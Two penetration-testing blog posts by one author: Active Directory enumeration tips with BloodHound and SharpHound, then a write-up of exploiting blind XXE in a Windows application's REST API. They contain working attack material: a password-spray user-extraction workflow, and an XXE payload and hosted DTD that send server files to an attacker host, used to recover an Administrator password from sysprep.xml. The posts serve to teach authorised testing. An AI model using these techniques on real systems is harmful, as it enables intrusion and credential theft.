  • Writer: Warren Butterworth
  • Jun 22, 2022
  • 4 min read


Everyone in the infosec community has heard of BloodHound. It's a tool used to enumerate Active Directory and my go-to on internal engagements. BloodHound uses graph theory and was created by some of the amazing people over at SpecterOps.

I have used BloodHound a fair bit, and while I am by no means an expert, I thought I'd put together this post of a few things that have helped me and might help other infosec professionals.


Loop collection method

While this is in the docs, I feel it might be something that's overlooked. Group memberships, group policy, users, etc. are areas within Active Directory that don't generally update throughout the day. User sessions, however, change often as users log in and out of workstations and servers. This can be a great technique for understanding where a domain admin has been. All you need to do is run the Session collection method for a period of time; SharpHound will continue to run, dumping session data as it goes, which can then be imported into BloodHound.

--CollectionMethod Session --Loop --LoopDuration 02:00:00

To see the percentage of session data you already have within BloodHound, run the below query in the neo4j console.

MATCH (u1:User)
WITH COUNT(u1) AS totalusers
MATCH (c:Computer)-[r:HasSession]->(u2:User)
RETURN 100 * COUNT(DISTINCT(u2)) / totalusers AS userPercentage

Password Spray

Once you have a set of valid credentials, you can then use SharpHound to gather all Active Directory information, including users and groups. I like to find the Domain Users group, select the total number of users, and dump them to a JSON file.

With a little grepping you can extract all user accounts from this file and use them for a password spray with weak passwords. If you have 3,000 users, how many have Password1 or Summer2022 set as their password?

cat users.json | cut -d ':' -f 2 | sed 's|[",\t]||g' | sort -u | tee -a users
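If you'd rather not rely on grep and cut, a short Python sketch can pull the account names out of the JSON properly. This assumes a SharpHound layout where each object sits under a top-level "data" list with a "Properties" dictionary holding "name" (as USER@DOMAIN) and "enabled" — the schema varies between SharpHound versions, so check your own dump first:

```python
import json

def extract_users(path):
    """Pull enabled account names from a SharpHound users dump.

    Assumed layout (verify against your SharpHound version):
    {"data": [{"Properties": {"name": "USER@DOMAIN", "enabled": true}}, ...]}
    """
    with open(path) as f:
        dump = json.load(f)
    users = set()
    for obj in dump.get("data", []):
        props = obj.get("Properties", {})
        name = props.get("name", "")
        # only keep enabled accounts -- no point spraying disabled ones
        if props.get("enabled") and "@" in name:
            users.add(name.split("@")[0].lower())
    return sorted(users)
```

Spraying only enabled accounts keeps the noise, and the lockout risk, down.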

AD CS & Custom Queries

If you've been living under a rock and haven't heard about AD CS abuse, then this whitepaper by Will and Lee from SpecterOps (again!) is a must-read. Using a tool by Oliver Lyak called Certipy, you can enumerate Active Directory Certificate Services (AD CS).

This tool queries AD and dumps a JSON file which can be loaded into BloodHound on top of SharpHound's previous data. (Certipy does a lot more, but in this scenario we are only interested in the BloodHound data.) After uploading, you will need to add the custom queries to neo4j. Once added, you can run queries on the data looking for all AD CS vulnerabilities. Reference the above whitepaper for abuse scenarios.


More Custom Queries

Over time you find queries which help you and start modifying them to your needs. For example, within BloodHound there is a query to show out-of-date operating systems, and I often look at this on an engagement. The issue with this query is that those workstations/servers could be disabled, with an administrator simply not having tidied up Active Directory, so the stale objects still show up in your SharpHound dump. Adding the enabled property to the below query helps with this.

MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*(2000|2003|2008|xp|vista|7|me).*' AND H.enabled = true RETURN H

Another quick tip: by default, BloodHound marks a few high-profile targets on initial graphing (Administrator, etc.). On one engagement I had 35 domain admins across the whole estate (yeah, 35!), so these were all targets for my engagement. To mark them manually you right-click each one and select "Set as High Value Target". Thirty-five right-clicks was going to take way too long for me, so enter the below raw query.

MATCH p=(n:Group)<-[:MemberOf*1..]-(m) WHERE n.objectid =~ "(?i)S-1-5-.*-512" SET m.highvalue = true RETURN m

These are small tweaks to existing queries, but they save me time, and I have many more like them that really help. There are plenty of blogs and repositories out there created by others in the industry that collect these and many more, too many to list here. What I'm trying to say is: tweak them, build your own, make them do what you need them to do.


Non Domain Joined

Again, this is all in the docs, but often your first entry on an internal engagement will be a brute-forced password from spraying or a cracked password from Responder. While not an officially supported collection method, dumping SharpHound data from a non-domain-joined machine can aid in enumerating the domain. NOTE: amend your DNS server to be the IP address of a domain controller within the target network. You can spawn a command shell or PowerShell as the breached user using runas.

runas /netonly /user:DOMAIN\user.name powershell.exe

I use a similar technique for PowerSploit as well:

$cred = Get-Credential

This then allows you to supply the credential to PowerSploit commands as below:

-Credential $cred

Final thoughts

None of this is new and there are lots of blogs detailing some of the above in more detail. The bloodhound docs are a must read. I just wanted to share a few tips that have helped me and that I find useful on every test.

  • Writer: Warren Butterworth
  • Aug 27, 2021
  • 3 min read

Updated: Jan 17, 2024





Disclaimer: Details are Generic and no client information is present in this post.

For clarity, from PortSwigger.net:

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

On a recent penetration test, I was tasked with testing a bespoke Windows application that connected to a REST API. The application was used by sales team members to create quotes and manage clients. Since these people were often on the road and sometimes had no access to the internet all day, the data was stored locally by the application. Once connected to the internet, it would sync local data with cloud data.


Initially, I spent time using the application and capturing the requests sent to and from the server. As most of the data was stored locally, most of these requests were very similar: push new data to the server, check data, and pull specific items that had not previously been downloaded (i.e. catalogues), and that was about it. The 3-4 requests in Burp were all very similar.


I noticed that when I amended a customer's details in the application and saved, the local copy was updated and a POST request was also sent with the updated info. I grabbed this request, sent it to Repeater, and started playing around. Straight away I thought, "I'm gonna try XXE…", so this is where I started. The first attempt with Burp Collaborator yielded positive results.


Burp collaborator gets a hit


Amazing. The next step was to see what juicy information I could exfiltrate…


So I created a malicious DTD file on my VPS and set it up to read files from the server using the below syntax. As this was a Windows server, the first call was for C:/windows/win.ini.


Hosted Malicious dtd


win.ini received
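For reference, the general shape of this technique (blind XXE exfiltration through a hosted DTD) can be sketched as below. This is a generic reconstruction rather than the exact payload from the engagement, and the attacker host is hypothetical:

```python
# Blind out-of-band XXE: the request body pulls an external DTD from the
# attacker's server; that DTD reads a local file into a parameter entity
# and leaks it back inside the URL of a second HTTP request.
ATTACKER = "http://attacker.example.net"   # hypothetical VPS
TARGET_FILE = "c:/windows/win.ini"

# evil.dtd -- hosted on the VPS. The &#x25; is an escaped '%' so the
# nested parameter entity declaration survives the first parse.
hosted_dtd = (
    f'<!ENTITY % file SYSTEM "file:///{TARGET_FILE}">\n'
    f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{ATTACKER}/?d=%file;\'>">\n'
    '%eval;\n'
    '%exfil;'
)

# XML body submitted to the vulnerable endpoint.
request_body = (
    '<?xml version="1.0"?>\n'
    f'<!DOCTYPE data [<!ENTITY % dtd SYSTEM "{ATTACKER}/evil.dtd"> %dtd;]>\n'
    '<data>quote</data>'
)
```

Files containing characters like < or & will break the HTTP syntax of the exfil request, which is where switching the exfil URL to another scheme such as ftp:// can sometimes help.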


The next hour or so was spent plugging in potential files to exfiltrate, but most of these were not hitting or would send back an 'access is denied' response, or some characters would break the HTTP syntax.

I thought I'd try a few more things and see what I could learn. I tried internal port scanning, but couldn't get results. Then I attempted to see if the FTP protocol would connect outbound, so I fired up Responder and waited.




Well, that worked…

So what about the SMB protocol? After reading the following blog, I was hopeful. Maybe I could capture a NetNTLM hash? But this wasn't to be: the SMB protocol was blocked for outbound connections.

I could confirm the presence of internal SMB shares….




Hmmm… so what next? Well, so far I could exfiltrate some local files, confirm internal shares, and connect outbound using FTP and HTTP, but I needed something a bit better than "I managed to get hold of the win.ini file". I wanted something a little more jaw-dropping than that.

I went back to file extraction and started to look at files that you would generally look for during privilege escalation.

First up was Unattended.xml.



The HTTP syntax kept getting broken. So I started looking for sysprep.inf and sysprep.xml, which are used to deploy image-based installations.

On the first try, I managed to get sysprep.inf.


After URL decoding I was presented with an encrypted Administrator hash!

I wanted to keep digging, so I needed a comprehensive list of the locations of interesting Windows files, and I came across this list by soffensive on GitHub. I started trying all the similar locations for sysprep.xml. Finally, by using the below payload hosted on my VPS, I was rewarded.



This time, however, the file included the base64-encoded username and password for the Administrator. After a quick decode, I had a plaintext username and password.


Administrator Password
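The decode itself is a one-liner. As an illustration with a made-up blob (in unattend/sysprep answer files the stored value is plain base64, and for some fields the element name is appended to the password before encoding, so it needs stripping afterwards):

```python
import base64

# Made-up blob standing in for a <AdministratorPassword><Value> entry;
# some answer-file fields append the field name before base64-encoding.
blob = base64.b64encode(b"Summer2022!AdministratorPassword").decode()

decoded = base64.b64decode(blob).decode()
password = decoded.removesuffix("AdministratorPassword")
print(password)  # -> Summer2022!
```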


Now, I had something with more impact than win.ini to include in the final report.

This is my first post, so please be gentle. But I always believe that sharing is caring!


I will try to put more posts together, but in the meantime you can always follow me on Twitter. I'd like to shout out the blogs that helped me along the way.







© 2024 by Warren Butterworth.